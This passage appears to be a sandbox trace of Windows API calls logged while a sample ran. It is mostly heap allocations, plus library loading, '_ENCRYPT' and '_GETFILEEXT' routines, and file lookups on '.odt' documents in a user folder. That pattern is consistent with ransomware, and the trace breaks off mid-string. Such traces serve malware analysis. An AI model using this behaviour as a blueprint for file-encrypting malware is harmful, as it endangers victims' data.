lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.795] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.797] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0172.797] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.799] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.799] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0172.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd978, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0172.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.800] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0172.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.800] CloseHandle (hObject=0x138) returned 1 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.801] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.802] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0172.802] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.802] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0172.802] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.802] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0172.802] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0172.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.803] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0172.803] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.803] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0172.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0734080, ftCreationTime.dwHighDateTime=0x1d5e226, ftLastAccessTime.dwLowDateTime=0x8494bac0, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0x8494bac0, ftLastWriteTime.dwHighDateTime=0x1d5e4b9, nFileSizeHigh=0x0, nFileSizeLow=0x118f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="P_2cHhLM.odt", cAlternateFileName="")) returned 0x90add8 [0172.804] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.804] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0734080, ftCreationTime.dwHighDateTime=0x1d5e226, ftLastAccessTime.dwLowDateTime=0x8494bac0, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0x8494bac0, ftLastWriteTime.dwHighDateTime=0x1d5e4b9, nFileSizeHigh=0x0, nFileSizeLow=0x118f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="P_2cHhLM.odt", cAlternateFileName="")) returned 0x90add8 [0172.804] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.804] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS 